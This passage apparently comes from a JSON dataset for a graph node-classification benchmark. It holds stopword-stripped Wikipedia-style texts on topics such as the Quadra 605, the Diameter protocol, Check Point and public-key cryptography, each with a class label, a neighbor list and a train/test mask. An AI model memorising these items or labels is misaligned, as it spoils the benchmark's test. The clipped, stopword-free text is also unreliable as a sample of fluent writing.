mb newer memcjr used quadra 605 recognizes larger sizes video video provided one da15f connector compatible vga monitors use adaptor two internal video ram slots take either two 256 kb 80 ns 68-pin vram simms two 512 kb simms installing one 512 kb one 256 kb vram simm garbles display resolutions colors available two vram configurations shown table audio recording possible 11,000 22,000 samples/second filters applied 3.5 khz 7 khz respectively recording floppy drive 1.4 mb superdrive manual-inject hard drive 80 mb 160 mb 230 mb scsi hard drive depending model battery quadra 605s take lithium half-aa cell 3.6 v battery battery drained video start start quadra 605 flat missing battery turned seconds turned second leaves enough charge system capacitors video start power supply 30 watts standard many second-hand machines come replacement psus either third-party apple replacement stripped earlier lc models go 45 watts quadra 605 registered energy star-compliant product weight 8.8 lb 4 kg standard quadra 605 support monitor 35 lb 15.9 kg dimensions 2.9 high x 12.2 wide x 15.3 deep 7.4 cm high x 31 cm wide x 38.8 cm deep quadra 605 contains one lc iii-style 68030-compatible lc processor direct slot mechanically compatible previous models lc pds take 96-pin 114-pin lc pds slot cards true lc pds emulates previous machine 68030 slot due success lc pds earlier macs many expansion options already manufactured apple kept slot type 68040 machines quadra 605 lc pds mostly 68030-compatible expansion cards made specifically '030 processors 68881 68882 fpus work addition utilize apple iie card allows 605 emulate apple iie quadra 605 one scsi bus 50-pin internal connector space one low-profile 3.5 scsi device one 25-pin db25f external connector scsi provided ncr 53c96 controller achieve 6 mb/s internally fast enough drive 4 mb/s externally two serial ports provided quadra 605 one 8-pin mini-din printer port one 9-pin mini-din modem port similar printer port extra pin supply +5 v power adb power supply apple recommends 100 drawn pin quadra 605 like macintoshes manufactured 1999 includes apple desktop bus port use keyboard mouse low-speed low-power peripherals earlier models also contain rom simm socket located left vram simms made slot boards contain solder pads indicating position roms used production machines two surface mount chips located directly behind cpu quadra 605s use 1024 kb rom version 7c quadra 605 compatible apple macintosh processor upgrade card provided 50 mhz powerpc 601 cpu daystar digital sonnet manufactured 100 mhz versions card could also used quadra 605 upgrade cards fitted lc pds expansion slot making slot unavailable expansion cards quadra 605s cuda reset switch used manually reset pram located towards rear motherboard front audio port labeled s1 others include switch instead two solder pads within silkscreened square keyboard power-on key start quadra 605 soft power-on rocker switch back turn quadra 605 pressing power-on key booted selecting shut command finder quadra 605 completed shutdown process prompt operator manually turn quadra 605s reset button programmer button key combinations perform functions reset users hold command control power keys programmer button click users hold command power keys hard crash situations even enough restore system case power switch recourse modified quadra 605 motherboard used basis early apple interactive television box prototypes later prototypes used board design still retained resemblance 605 standard gestalt id 25 mhz quadra 605 94 id logic board quadra 605 shares lc/performa models depends two things jumper j18 located behind hard drive identify computer quadra 605 id 94 25 mhz lc475/performa 47x id 89 25 mhz over-clocking under-clocking motherboard also changes gestalt id list gestalt ids returned various logic board modifications speed reported newer technology clockometer follows standard quadra 605 capable running classic mac os versions 7.1 7.1.1 pro 7.5 7.5.1 7.5.3 7.5.5 7.6 7.6.1 8.0 8.1 powerpc upgrade installed run 8.5 8.5.1 8.6 9.0 9.0.1 9.0.2 9.0.3 9.0.4 9.1 versions system software 7.5 require use system enabler 065 quadra 605 running version system 7.1 over-clocking standard 25 mhz 33 mhz change gestalt id enabler recognize new id under-clocking 20 mhz however change gestalt id one enabler n't recognize compatible system wo n't boot system 7.5 later affected issue",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      209,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      9182,
      2023,
      10734,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 8666,
    "label": 4,
    "text": "Network_intelligence:network intelligence network intelligence ni technology builds concepts capabilities deep packet inspection dpi packet capture business intelligence bi examines real time ip data packets cross communications networks identifying protocols used extracting packet content metadata rapid analysis data relationships communications patterns also sometimes referred network acceleration piracy ni used middleware capture feed information network operator applications bandwidth management traffic shaping policy management charging billing including usage-based content billing service assurance revenue assurance market research mega panel analytics lawful interception cyber security currently incorporated wide range applications vendors provide technology solutions communications service providers csps governments large enterprises ni extends network controls business capabilities security functions data mining new products services needed since emergence web 2.0 wireless 3g 4g technologies evolution growth internet wireless technologies offer possibilities new types products services well opportunities hackers criminal organizations exploit weaknesses perpetrate cyber crime network optimization security solutions therefore need address exponential increases ip traffic methods access types activity volume content generated traditional dpi tools established vendors historically addressed specific network infrastructure applications bandwidth management performance optimization quality service qos dpi focuses recognizing different types ip traffic part csp ’ infrastructure ni provides granular analysis enables vendors create information layer metadata ip traffic feed multiple applications detailed expansive visibility network-based activity ni technology goes beyond traditional dpi since recognizes protocols also extracts wide range valuable metadata ni ’ value-add solutions traditionally based dpi attracted attention industry analysts specialize dpi market research example heavy reading includes ni companies deep packet inspection semi-annual market tracker much way bi technology synthesizes business application data variety sources business visibility better decision-making ni technology correlates network traffic data variety data communication vehicles network visibility enabling better cyber security ip services ongoing changes communications networks information exchanged people longer linked exclusively physical subscriber lines person communicate multiple ways – ftp webmail voip instant messaging online chat blogs social networks – different access points via desktops laptops mobile devices ni provides means quickly identify examine correlate interactions involving internet users applications protocols whether protocols tunneled follow osi model technology enables global understanding network traffic applications need correlate information contacts accesses database information viewed combined traditional bi tools examine service quality customer care ni creates powerful nexus subscriber network data telcos internet service providers isps mobile network operators mnos increasing competitive pressures move smart pipe business models cost savings revenue opportunities driving smart pipe strategies also apply network equipment providers software vendors systems integrators serve industry ni captures detailed information hundreds ip applications cross mobile networks provides required visibility analysis user demand create deliver differentiating services well manage usage deployed customer metrics especially important telecom companies understand consumer behaviors create personalized ip services ni enables faster sophisticated audience measurement user behavior analysis customer segmentation personalized services real-time network metrics equally important companies deliver manage services ni classifies protocols applications layers 2 7 generates metadata communication sessions correlates activity layers applicable bandwidth resource optimization quality service qos content-based billing quality experience qoe voip fraud monitoring regulatory compliance economics deployment speed cloud computing fueling rapid adoption companies government agencies among concerns however risks information security e-discovery regulatory compliance auditing ni mitigates risks providing infrastructure service iaas platform service paas software service saas vendors real-time situational awareness network activity critical transparency allay fears potential customers vendor demonstrate hardened network security prevent data leakage data theft irrefutable audit trail network transaction – communication content – related customer ’ account assuming compliance regulation standards ni extracts correlates information contacts providing situational awareness lawful interception cyber security real-time data capture extraction analysis allow security specialists take preventive measures protect network assets real time complement post-mortem analysis attack ni combines real-time network monitoring ip metadata extraction enhances effectiveness applications database security database auditing network protection network visibility afforded ni also used build enhancements next-generation solutions network performance management wan optimization customer experience management content filtering internal billing networked applications",
    "neighbors": [
      1314,
      4194,
      7364,
      7972,
      8518,
      939,
      9868,
      467,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8667,
    "label": 4,
    "text": "National_Cybersecurity_and_Communications_Integration_Center:national cybersecurity communications integration center national cybersecurity communications integration center nccic part office cybersecurity communications u.s. department homeland security acts coordinate various aspects u.s. federal government cybersecurity cyberattack mitigation efforts cooperation civilian agencies infrastructure operators state local governments international partners also responsible coordinating national response significant cyber incidents accordance national cyber incident response plan ncirp nccic consists four branches",
    "neighbors": [
      4163,
      2148,
      4689,
      4081,
      11358,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8668,
    "label": 4,
    "text": "Check_Point:check point check point multinational provider software combined hardware software products security including network security endpoint security cloud security mobile security data security security management check point established ramat-gan israel 1993 gil shwed ceo marius nacht chairman shlomo kramer left check point 2003 shwed initial idea company core technology known stateful inspection became foundation company first product firewall-1 soon afterwards also developed one world first vpn products vpn-1 shwed developed idea serving unit 8200 israel defense forces worked securing classified networks initial funding us 400,000 provided venture capital fund brm group 1994 check point signed oem agreement sun microsystems followed distribution agreement hp 1995 year u.s. head office established redwood city california february 1996 company named worldwide firewall market leader idc market share 40 percent june 1996 check point raised 67 million initial public offering nasdaq 1998 check point established partnership nokia bundled check point software nokia computer network security appliances 2003 class action lawsuit filed check point violation securities exchange act failing disclose major financial information first decade 21st century check point started acquiring security companies including nokia network security business unit 2009 2019 researchers check point found security breach xiaomi phone apps security flaw reported preinstalled check point presently focused calls fifth generation cyber security “ gen v. ” identifies fifth generation focused large-scale fast moving attacks across mobile cloud on-premise networks easily bypass conventional static detection-based defenses used organizations today years many employees worked check point left start software companies include shlomo kremer started imperva nir zuk founded palo alto networks ruvi kitov reuven harrison tufin yonadav leitersdorf founded indeni check point offers following primary products 2005 check point tried acquire intrusion prevention system developers sourcefire 225 million later withdrew offer became clear us authorities specifically committee foreign investment united states would try block acquisition sofaware technologies founded 1999 cooperation check point sofaware founders adi ruppin etay bogner purpose extending check point enterprise market small business consumer branch office market sofaware co-founder adi ruppin said company wanted make technology simple use affordable lift burden security management end users adding features 2001 sofaware began selling firewall appliances sofaware s-box brand 2002 company started selling safe office safe home line security appliances check point brand fourth quarter 2002 sales sofaware safe office firewall/vpn appliances increased greatly sofaware held 1 revenue position worldwide firewall/vpn sub- 490 appliance market 38 revenue market share relations check point sofaware founders went sour company acquisition 2002 2004 etay bogner co-founder sofaware sought court approval file shareholder derivative suit claiming check point transferring funds sofaware required use sofaware products technology derivative suit ultimately successful check point ordered pay sofaware 13 million shekels breach contract 2006 tel aviv district court judge ruled bogner sofaware could sue check point proxy 5.1 million alleged damage sofaware bogner claimed check point owned 60 sofaware behaved belligerently withheld monies due use sofaware technology products check point appealed ruling lost 2009 israeli supreme court ruled group founders sofaware includes bogner veto power decision sofaware court ruled three founders could exercise veto power group majority rule 2011 check point settled litigation relating sofaware part settlement acquired sofaware shares held bogner ruppin began process acquiring remaining shares resulting sofaware becoming wholly owned subsidiary",
    "neighbors": [
      2049,
      1052,
      2082,
      11299,
      9764,
      550,
      2601,
      6699,
      10291,
      3125,
      10308,
      11333,
      2118,
      2134,
      94,
      2654,
      10872,
      9341,
      127,
      9855,
      7809,
      131,
      9863,
      7820,
      9356,
      5776,
      3732,
      156,
      9375,
      2721,
      8865,
      2213,
      9894,
      6823,
      7336,
      3243,
      6834,
      704,
      7362,
      9413,
      202,
      9423,
      8921,
      1242,
      6364,
      8413,
      6382,
      5371,
      10492,
      5891,
      5384,
      9488,
      8467,
      4374,
      6431,
      5924,
      1318,
      8998,
      3880,
      2859,
      3885,
      4403,
      9523,
      3381,
      3382,
      11577,
      9537,
      4421,
      1355,
      10574,
      6481,
      6993,
      8024,
      2907,
      9055,
      9569,
      7522,
      11622,
      4464,
      3955,
      4475,
      11646,
      9607,
      1417,
      3981,
      10637,
      8614,
      8615,
      939,
      1970,
      10166,
      7103,
      9665,
      5069,
      10708,
      2005,
      4568,
      11225,
      1498,
      2538,
      2539,
      6635,
      9713,
      6643,
      10745,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8669,
    "label": 5,
    "text": "Generic_Stream_Encapsulation:generic stream encapsulation gse provides additional features beyond pure carriage ip datagrams increase protocol flexibility applicability key gse functions/characteristics protocol specification published etsi ts 102 606 accompanying implementation guidelines document published etsi ts 102 771 ip datagrams ethernet frames network layer packets encapsulated one gse packets encapsulation process adds control information network protocol type address label provides overall integrity check needed payload frame may encapsulated single gse packet sliced fragments encapsulated several gse packets gse packets general variable length order match input ip traffic minimum overhead gse packets may sent different base band frames necessarily consecutive transmission parameters modulation format coding rate constraint gse packet position within base band frame assumed however gse packets may reordered encapsulator de-encapsulator general base band frame contain single gse packet base band frames may fixed variable length gse provide mechanism integrity check single gse packet crc-32 appended last fragment fragmented payload verify correctness reassembly operation gse relies physical layer able ensure required error detection and/or correction probability gse packet header highly dynamic provides many options minimum header two bytes comprising three flags fields 12-bit payload length field diagram shows possible fields basic mechanism gse payload fragmentation uses start end flags start flag indicates beginning payload frame end flag indicates end shown diagram dvb-s2 dvb-t2 dvb-c2 acm/vcm modes may cause base band frames vary size depending transmission conditions hence may situations first fragments payload frame sent encapsulator forced set aside current payload frame start working new one may e.g occur large fragments prepared transmission conditions fine suddenly conditions deteriorate small base band frames available fragment id field becomes important short-term identification payload frame whenever encapsulator needs move next payload frame without finished transmitting previous one uses next available fragment id way 256 payload frames kept open time decapsulator uses fragment id pick reassembly buffer store fragment label type lt bits determine gse packet address encoded according following table gse packet containing last fragment payload frame carries crc-32 checksum payload frame checksum used detect loss intermediate fragments checksum 32 bit value calculated according generator polynomial represented 0x104c11db7 formula_1 last fragment payload frame lost decapsulator directly detect fact never sees gse frame end flag set containing crc-32 situation decapsulator must choose suitable time-out based data-rate application since gse packets directly inserted base-band frames modulation scheme gse products come form gse routers gse modems outside act much like dsl router dsl modem used consumers generically devices also referred gse encapsulators products standard ip network interface often ethernet similar lan interface collect ip traffic forwarded uni-directional link end optimise packaging base-band frames devices typically generate complete base-band frames gse packets payload transferred dvb-s2 dvb-t2 dvb-c2 modulator second interface likely incomplete list gse en- decapsulators many ip-over-satellite service offerings including instance astra2connect ses tooway eutelsat little detail however known protocols used since receivers provided part service operators little technical detail disclosed",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9506,
      9380,
      2085,
      8998,
      3751,
      3752,
      9381,
      10924,
      3629,
      562,
      2996,
      9909,
      7865,
      10171,
      4797,
      3006,
      3133,
      702,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      7411,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 8670,
    "label": 5,
    "text": "Diameter_(protocol):diameter protocol diameter authentication authorization accounting protocol computer networks evolved earlier radius protocol belongs application layer protocols internet protocol suite diameter applications extend base protocol adding new commands and/or attributes use extensible authentication protocol eap name play words derived radius protocol predecessor diameter twice radius diameter directly backwards compatible provides upgrade path radius main features provided diameter lacking radius also like radius intended work local roaming aaa situations uses tcp sctp unlike radius uses udp unlike radius includes encryption protected transport level security ipsec tls base size av identifier 32 bit unlike radius uses 8 bit base av identifier size like radius supports stateless well stateful modes like radius supports application layer acknowledgment defines failover diameter used many different interfaces defined 3gpp standards interface typically defining new commands attributes diameter application software application protocol based diameter base protocol defined rfc 6733 rfc 7075 obsoletes rfc 3588 application defined application identifier add new command codes and/or new mandatory avps attribute-value pair adding new optional avp require new application examples diameter applications generic bootstrapping architecture bootstrapping server function diameter protocol initially developed pat r. calhoun glen zorn ping pan 1998 provide framework authentication authorization accounting aaa could overcome limitations radius radius issues reliability scalability security flexibility radius deal effectively remote access ip mobility policy control diameter protocol defines policy protocol used clients perform policy aaa resource control allows single server handle policies many services like radius diameter provides aaa functionality uses tcp sctp instead udp therefore delegating detection handling communication problems protocols diameter protocol enhanced development 3rd generation partnership project 3gpp ip multimedia subsystem ims cx dh dx rf ro sh zh interfaces supported diameter applications use extensions protocol designed extensible support proxies brokers strong security mobile ip network-access servers nasreq accounting resource management diameter base protocol defined rfc 6733 obsoletes rfc 3588 defines minimum requirements aaa protocol diameter applications extend base protocol adding new commands attributes diameter security provided ipsec tls iana assigned tcp sctp port number 3868 diameter packet consists diameter header variable number attribute-value pairs avps encapsulating information relevant diameter message field indicates version diameter base protocol 2014 value supported 1 message length field indicates length diameter message bytes including header fields padded avps r request bit – set message request cleared message answer p proxiable bit – set message may proxied relayed redirected cleared message must locally processed e error bit – set message contains protocol error message conform ccf described command messages e bit set commonly referred error messages bit must set request messages potentially re-transmitted message bit – flag set link failover procedure aid removal duplicate requests set resending requests yet acknowledged indication possible duplicate due link failure command request/answer pair assigned command code whether request answer identified via ’ r ’ bit command flags field header values 0-255 reserved radius backward compatibility values 256-16777213 permanent standard commands allocated iana values 16777214 16777215 hex 0xfffffe 0xffffff reserved experimental testing purposes command code used determine action taken particular message common diameter commands defined protocol base applications application-id used identify diameter application message applicable application authentication application accounting application vendor-specific application diameter agents conforming certain diameter extension publicize support including specific value auth-application-id attribute capabilities-exchange-request cer capabilities-exchange-answer cea command value application-id field header relevant application-id avps contained message instance value application-id auth-application-id attribute credit-control-request ccr credit-control-answer cca command diameter credit-control application 4 hop-by-hop identifier unsigned 32-bit integer field network byte order used match requests answers value request used response diameter protocol requires relaying proxying agents maintain transaction state used failover purposes transaction state implies upon forwarding request hop-by-hop identifier saved field replaced locally unique identifier restored original value corresponding answer received request ’ state released upon receipt answer received answers match known hop-by-hop identifier ignored diameter agent case redirecting agents hop-by-hop identifier maintained header diameter agent responds answer message end-to-end identifier unsigned 32-bit integer field network byte order used detect duplicate messages along combination origin-host avp creating request end-to-end identifier set locally unique value end-to-end identifier modified diameter agents kind value corresponding request used answer simplicity v bit means vendor specific bit means mandatory p bit means protected v bit known vendor-specific bit indicates whether optional vendor-id field present avp header set avp code belongs specific vendor code address space bit known mandatory bit indicates whether support avp required avp bit set received diameter client server proxy translation agent either avp value unrecognized message must rejected diameter relay redirect agents must reject messages unrecognized avps p bit indicates need encryption end-to-end security rfc 3588 defines core state machine maintaining connections peers processing messages part basic protocol functionality stacks support abstract connectivity related operations additionally application specific state machines introduced either later higher abstraction layer rfc 3588 defines authorization accounting state machine communication two diameter peers starts establishment transport connection tcp sctp initiator sends capabilities-exchange-request cer peer responds capabilities-exchange-answer cea rfc3588 compliant peers tls transport layer security may optionally negotiated rfc6733 compliant peers tls negotiation may optionally happen cer/cea connection ready exchanging application messages messages exchanged time either side may send device-watchdog-request dwr peer must respond device-watchdog-answer either side may terminate communication sending disconnect-peer-request dpr peer must respond disconnect-peer-answer transport connection disconnected diameter protocol currently defined following ietf rfcs obsolete rfcs indicated strikethrough text",
    "neighbors": [
      10242,
      7,
      3847,
      649,
      9868,
      3218,
      4242,
      3477,
      9365,
      10005,
      11413,
      1433,
      5402,
      5531,
      3742,
      10271,
      2080,
      2083,
      9380,
      2085,
      9381,
      2087,
      3751,
      3752,
      9635,
      10924,
      562,
      2996,
      9909,
      4663,
      5433,
      5178,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      5568,
      9665,
      7364,
      2887,
      8265,
      10058,
      2509,
      4687,
      6993,
      6098,
      5843,
      4053,
      2904,
      1501,
      5469,
      2143,
      5470,
      5471,
      2274,
      5472,
      6750,
      6881,
      10341,
      6888,
      10344,
      11112,
      367,
      8432,
      1012,
      6904,
      3450,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 8671,
    "label": 2,
    "text": "USENIX:usenix usenix association supports operating system research founded 1975 name unix users group focusing primarily study development unix similar systems june 1977 lawyer corporation informed group could use word unix trademark western electric manufacturing arm 1995 led change name usenix since grown respected organization among practitioners developers researchers computer operating systems generally since founding published technical journal entitled usenix started technical organization commercial interest grew number separate groups started parallel notably software tools users group stug technical adjunct unix-like tools interface non-unix operating systems /usr/group commercially oriented user group sponsors several conferences workshops year notably usenix symposium operating systems design implementation osdi usenix symposium networked systems design implementation nsdi usenix annual technical conference usenix security symposium usenix conference file storage technologies fast lisa formerly sage large installation system administration conference lisa usenix founding president lou katz usenix became first computing association provide open access conference workshop papers 2008. remains one done since 2011 included audio video recordings paper presentations open-access materials award also called flame award presented since 1993",
    "neighbors": [
      6532,
      7561,
      2187,
      5771,
      2061,
      7565,
      7567,
      3984,
      1683,
      6803,
      2581,
      3350,
      8599,
      6808,
      7449,
      7450,
      9214,
      9750,
      11158,
      5534,
      3488,
      4770,
      5156,
      1957,
      294,
      4265,
      4780,
      7085,
      7983,
      692,
      310,
      6968,
      6331,
      9151,
      9791,
      9153,
      8772,
      2629,
      3013,
      7624,
      1865,
      2634,
      2123,
      3914,
      4426,
      8395,
      592,
      1360,
      850,
      5969,
      9298,
      4695,
      10455,
      7770,
      8410,
      9948,
      3551,
      6754,
      5731,
      11363,
      1125,
      10726,
      4071,
      7655,
      9452,
      11500,
      1394,
      11506,
      5492,
      6773,
      4857,
      10876,
      3582,
      2687
    ],
    "mask": "Test"
  },
  {
    "node_id": 8672,
    "label": 1,
    "text": "Foreign_Ship_Registry_Act:foreign ship registry act foreign ship registry act federal legislation provided admission foreign-built ships american registry provided admission foreign-built ships american registry foreign trade making easier legally hoist american flag bill provided survey measurement inspection ships though require american ownership majority stock corporations applying american registry clear violation international custom international law theoretically germany could get american registration hoist u.s. flag merchant vessels avoid british blockade possibility provoked much british protest however german owners vessels american harbors dared risk losing property take advantage act september 7 1917 president woodrow wilson issued executive order 2696 suspending united states statute period two years",
    "neighbors": [
      41,
      3090
    ],
    "mask": "Train"
  },
  {
    "node_id": 8673,
    "label": 2,
    "text": "Thomas_Bushnell:thomas bushnell thomas bushnell bsg formerly known michael bushnell born december 13 1967 software developer gregorian friar founder principal architect gnu official kernel project gnu hurd bushnell also hurd official maintainer instigation november 2003 posted gnu project discussion mailing list saying dismissed richard stallman criticizing gnu free documentation license stallman said dismissal bushnell inactive since 2001 n't responding mail bushnell currently maintains debian packages employed google llc member saint mark episcopal church glendale ca",
    "neighbors": [
      2050,
      2180,
      11654,
      4493,
      1939,
      802,
      3618,
      11180,
      5555,
      9148,
      10687,
      10822,
      5703,
      5833,
      8147,
      3674,
      2010,
      10464,
      9579,
      8304,
      1394,
      8436
    ],
    "mask": "Test"
  },
  {
    "node_id": 8674,
    "label": 4,
    "text": "Public-key_cryptography:public-key cryptography public-key cryptography asymmetric cryptography cryptographic system uses pairs keys public keys may disseminated widely private keys known owner generation keys depends cryptographic algorithms based mathematical problems produce one-way functions effective security requires keeping private key private public key openly distributed without compromising security system person encrypt message using receiver public key encrypted message decrypted receiver private key robust authentication also possible sender combine message private key create short digital signature message anyone corresponding public key combine message putative digital signature known public key verify whether signature valid i.e made owner corresponding private key public key algorithms fundamental security ingredients modern cryptosystems applications protocols assuring confidentiality authenticity non-repudiability electronic communications data storage underpin various internet standards transport layer security tls s/mime pgp gpg public key algorithms provide key distribution secrecy e.g. diffie–hellman key exchange provide digital signatures e.g. digital signature algorithm provide e.g. rsa mid-1970s cipher systems using symmetric key algorithms cryptographic key used underlying algorithm sender recipient must keep secret necessity key every system exchanged communicating parties secure way prior use system – secure channel requirement never trivial rapidly becomes unmanageable number participants increases secure channels n't available key exchange sensible cryptographic practice keys frequently changed particular messages meant secure users separate key required possible pair users contrast public key system public keys disseminated widely openly private key needs kept secure owner two best-known uses public key cryptography one important issue confidence/proof particular public key authentic i.e correct belongs person entity claimed tampered replaced malicious third party several possible approaches including public key infrastructure pki one third parties – known certificate authorities – certify ownership key pairs tls relies upon web trust decentralizes authentication using individual endorsements link user public key pgp uses approach well lookup domain name system dns dkim system digitally signing emails also uses approach obvious application public key encryption system encrypting communication provide confidentiality – message sender encrypts using recipient public key decrypted recipient paired private key another application public key cryptography digital signature digital signature schemes used sender authentication non-repudiation system use digital signatures ensure one party successfully dispute authorship document communication applications built foundation include digital cash password-authenticated key agreement time-stamping services non-repudiation protocols etc asymmetric key algorithms nearly always much computationally intensive symmetric ones many cases common exchange key using key-exchange algorithm transmit data using key symmetric key algorithm pgp ssh ssl/tls family schemes use procedure thus called hybrid cryptosystems like security-related systems important identify potential weaknesses public key schemes theory susceptible brute-force key search attack attacks however impractical amount computation needed succeed – termed work factor claude shannon – reach potential attackers many cases work factor increased simply choosing longer key algorithms may much lower work factors making resistance brute-force attack irrelevant special specific algorithms developed aid attacking public key encryption algorithms – rsa elgamal encryption known attacks much faster brute-force approach major weaknesses found several formerly promising asymmetric key algorithms knapsack packing algorithm found insecure development new attack recently attacks based careful measurements exact amount time takes known hardware encrypt plain text used simplify search likely decryption keys side-channel attack great deal active research currently underway discover protect new attack algorithms another potential security vulnerability using asymmetric keys possibility man-in-the-middle attack communication public keys intercepted third party man middle modified provide different public keys instead encrypted messages responses must also intercepted decrypted re-encrypted attacker using correct public keys different communication segments instances avoid suspicion attack may seem difficult implement practice impossible using insecure media e.g. public networks internet wireless forms communications – example malicious staff member internet service provider isp might find quite easy carry one approach prevent attacks involves use public key infrastructure pki set roles policies procedures needed create manage distribute use store revoke digital certificates manage public-key encryption however turn potential weaknesses example certificate authority issuing certificate must trusted properly checked identity key-holder must ensure correctness public key issues certificate must secure computer piracy must made arrangements participants check certificates protected communications begin web browsers instance supplied long list self-signed identity certificates pki providers – used check bona fides certificate authority second step certificates potential communicators attacker could subvert single one certificate authorities issuing certificate bogus public key could mount man-in-the-middle attack easily certificate scheme used alternate scenario rarely discussed attacker penetrated authority servers obtained store certificates keys public private would able spoof masquerade decrypt forge transactions without limit despite theoretical potential problems approach widely used examples include tls predecessor ssl commonly used provide security web browser transactions example securely send credit card details online store aside resistance attack particular key pair security certification hierarchy must considered deploying public key systems certificate authority – usually purpose-built program running server computer – vouches identities assigned specific private keys producing digital certificate public key digital certificates typically valid several years time associated private keys must held securely time private key used certificate creation higher pki server hierarchy compromised accidentally disclosed man-in-the-middle attack possible making subordinate certificate wholly insecure examples well-regarded asymmetric key techniques varied purposes include examples asymmetric key algorithms widely adopted include examples notable – yet insecure – asymmetric key algorithms include examples protocols using asymmetric key algorithms include early history cryptography two parties would rely upon key would exchange means secure non-cryptographic method face-to-face meeting trusted courier key parties kept absolutely secret could used exchange encrypted messages number significant practical difficulties arise approach distributing keys 1874 book principles science william stanley jevons wrote reader say two numbers multiplied together produce number 8616460799 think unlikely anyone ever know described relationship one-way functions cryptography went discuss specifically factorization problem used create trapdoor function july 1996 mathematician solomon w. golomb said jevons anticipated key feature rsa algorithm public key cryptography although certainly invent concept public key cryptography 1970 james h. ellis british cryptographer uk government communications headquarters gchq conceived possibility non-secret encryption called public key cryptography could see way implement 1973 colleague clifford cocks implemented become known rsa encryption algorithm giving practical method non-secret encryption 1974 another gchq mathematician cryptographer malcolm j. williamson developed known diffie–hellman key exchange scheme also passed usa national security agency military focus low computing power power public key cryptography unrealised organisations judged important military use ... share key rapidly electronically major advantage opponent end evolution berners-lee designing open internet architecture cern adaptation adoption arpanet ... public key cryptography realise full potential —ralph benjamin discovery publicly acknowledged 27 years research declassified british government 1997 1976 asymmetric key cryptosystem published whitfield diffie martin hellman influenced ralph merkle work public key distribution disclosed method public key agreement method key exchange uses exponentiation finite field came known diffie–hellman key exchange first published practical method establishing shared secret-key authenticated confidential communications channel without using prior shared secret merkle public key-agreement technique became known merkle puzzles invented 1974 published 1978 1977 generalization cocks scheme independently invented ron rivest adi shamir leonard adleman mit latter authors published work 1978 algorithm came known rsa initials rsa uses exponentiation modulo product two large primes encrypt decrypt performing public key encryption public key digital signature security connected extreme difficulty factoring large integers problem known efficient general technique since 1970s large number variety encryption digital signature key agreement techniques developed field public key cryptography including rabin cryptosystem elgamal encryption dsa elliptic curve cryptography",
    "neighbors": [
      513,
      2050,
      517,
      510,
      2567,
      7686,
      3084,
      9744,
      2580,
      1046,
      535,
      1054,
      4128,
      9248,
      2083,
      4644,
      7212,
      3629,
      2606,
      10806,
      7736,
      2110,
      1087,
      9281,
      3657,
      10315,
      10831,
      1105,
      8273,
      11345,
      8283,
      8286,
      7264,
      4195,
      10341,
      618,
      2154,
      1654,
      9336,
      2169,
      3707,
      6779,
      8828,
      10882,
      5764,
      1157,
      4746,
      658,
      1683,
      660,
      1173,
      1688,
      10908,
      3742,
      6309,
      8358,
      10918,
      169,
      177,
      9394,
      4793,
      7354,
      10426,
      8387,
      9412,
      713,
      5834,
      6863,
      7887,
      212,
      2265,
      3805,
      6381,
      238,
      7409,
      755,
      5875,
      9460,
      6905,
      11514,
      4863,
      262,
      1288,
      2829,
      5391,
      1297,
      3345,
      4883,
      5918,
      1315,
      4389,
      11046,
      298,
      6954,
      3377,
      11569,
      2357,
      10238,
      9528,
      5433,
      2373,
      10566,
      11088,
      9556,
      8040,
      1898,
      6509,
      5487,
      881,
      2932,
      7542,
      11639,
      7034,
      892,
      7556,
      2957,
      3982,
      9615,
      3984,
      2961,
      7056,
      8080,
      9617,
      1941,
      3477,
      1945,
      7075,
      11684,
      10662,
      10154,
      7085,
      11693,
      11185,
      8627,
      8630,
      8634,
      10173,
      11202,
      9165,
      7119,
      6098,
      9170,
      5590,
      1496,
      474,
      7643,
      9690,
      7135,
      9697,
      503,
      7139,
      9196,
      4595,
      5107,
      1012,
      501,
      1526,
      7161,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8675,
    "label": 2,
    "text": "Stand-alone_shell:stand-alone shell stand-alone shell codice_1 unix shell designed use recovering certain types system failures built-in commands sash libraries linked statically unlike shells linux standard unix commands rely external libraries example copy command cp requires libc.so ld-linux.so built gnu core utilities linux libraries get corrupted coreutils cp command would work however sash built-in command cp would unaffected earlier times critical commands including shells /sbin even /bin statically linked purpose whereas /usr/sbin /usr/bin would find feature-rich versions dynamically linked common anymore statically linked shells built-in commands become important sash following built-in commands sash shell also ported work androidin terminal-interface sash-plus-patches collection patches sash key features codice_32 codice_33 codice_19 commands however functions available newer versions sash functions provide interfaces respective linux system calls especially useful sash used initial ramdisk initrd environment addition simple shell variable expansion support added e.g. variable var replaced content environment variable var linux distributions debian slackware via slackbuilds.org available",
    "neighbors": [
      8576,
      515,
      516,
      2181,
      4995,
      8326,
      3976,
      5256,
      9733,
      9735,
      4750,
      5397,
      2198,
      9366,
      154,
      6812,
      10149,
      7847,
      10921,
      428,
      2605,
      3886,
      4398,
      7983,
      11442,
      823,
      1336,
      1849,
      7356,
      10176,
      321,
      10304,
      451,
      965,
      8262,
      8522,
      3659,
      4561,
      9946,
      477,
